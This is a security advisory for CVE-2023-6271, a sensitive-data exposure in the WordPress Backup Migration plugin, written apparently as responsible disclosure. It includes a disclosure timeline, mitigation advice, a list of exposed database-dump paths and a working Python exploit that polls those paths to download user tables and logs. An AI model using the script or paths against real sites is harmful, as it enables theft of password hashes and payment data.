A critical vulnerability has been identified in the Backup Migration plugin within the directory wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables. This flaw not only discloses comprehensive information about the site, including its configuration, directories, and files, but, more critically, grants unauthorized access to sensitive data within the database, posing a significant security risk. Exploiting this vulnerability can lead to imminent threats, including potential brute force attacks on password hashes and the subsequent compromise of the entire system.
Main info:
| CVE | CVE-2023-6271 |
| Plugin | Backup Migration < 1.3.6 |
| Critical | Super High |
| All Time | 1 095 243 |
| Active installations | 90 000+ |
| Publicly Published | December 11, 2023 |
| Last Updated | December 11, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6271 https://wpscan.com/vulnerability/7ac217db-f332-404b-a265-6dc86fe747b9/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| November 15, 2023 | Plugin testing and vulnerability detection in the Backup Migration plugin have been completed |
| November 15, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 1, 2023 | The author fixed the vulnerability and released the plugin update |
| December 10, 2023 | Registered CVE-2023-6271 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding of Sensitive Data Exposure attack’s
Sensitive data exposure refers to the unintended revelation of confidential information, making it accessible to unauthorized entities. In WordPress, this could involve exposing critical configuration details, directory structures, and files. Real-world examples demonstrate that attackers can leverage such exposure to gain insights into the site’s infrastructure, potentially leading to unauthorized access and manipulation of sensitive data.
Exploiting the Sensitive Data Exposure Vulnerability
Exploiting the Backup Migration vulnerability involves utilizing the exposed directory to gain unauthorized access to sensitive data. Attackers may target specific files, particularly those containing password hashes, and leverage this information to launch brute force attacks. By compromising password hashes, attackers can potentially gain control of user accounts, allowing for unauthorized access and manipulation of the entire system.
POC:
1) The plugin has the ability to automatically backup , but for the speed of the POC, I will do it manually, but this is similar to automatic scanning.
2) There is a lot of sensitive data and most importantly, you can download a backup file and upload it to your local car:
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_rm_notes.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_support_reply.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_links.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_defender_lockout.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_acyc_test.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_wpbdp_plans.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_users.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_rm_paypal_logs.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_cfs_sessions.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_termmeta.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/bmi_logs_this_backup.log
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_postmeta.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_actionscheduler_actions.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_logdash_activity_meta.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_support_attachment.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_term_taxonomy.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_WPLFLA_login_failed.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_actionscheduler_claims.sql
and etc
3)After reading wordpress/wp-content/backup-migration-(your_hash_from_log_file_upper)/complete_logs.log go to wordpress/wp-content/backup-migration-(your_hash_from_log_file)/backups/(hashed_name_from_log_file)
EXPLOIT (python3):
import requests import time import threading urls = [ "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_users.sql", "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_rm_paypal_logs.sql", "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_login_log.sql", "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_usermeta.sql", "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_rm_login_log.sql", "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/bmi_logs_this_backup.log", "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/bmi_backup_manifest.json" ] print("The following links are checked:") for url in urls: print(url) def check_url(url): while True: try: response = requests.get(url) if response.status_code == 200: print(f"File at {url} found! I display the contents...") print(response.text) except requests.RequestException as e: print(f"Error when requesting to {url}: {e}") time.sleep(0.5) for url in urls: thread = threading.Thread(target=check_url, args=(url,)) thread.start()___
The potential risk associated with this vulnerability is severe. In real-world scenarios, attackers could exploit the exposed directory to conduct reconnaissance on the site’s structure, locate crucial files, and access sensitive data within the database. This could lead to unauthorized access, data manipulation, and other malicious activities, ultimately compromising the integrity and security of the entire system.
Recommendations for Improved Security
- To mitigate the risks associated with this vulnerability, the following recommendations are advised:
- Directory Security Measures: Implement robust security measures for directories, including access controls and regular audits to detect and address vulnerabilities promptly.
- Database Encryption: Employ encryption for sensitive data stored in the database to safeguard it even if unauthorized access occurs.
- Plugin Update: Ensure that the Backup Migration plugin is regularly updated with the latest security patches to address this vulnerability.
- Password Policy: Enforce strong password policies to minimize the risk of successful brute force attacks.
By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the Backup Migration vulnerability.
#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
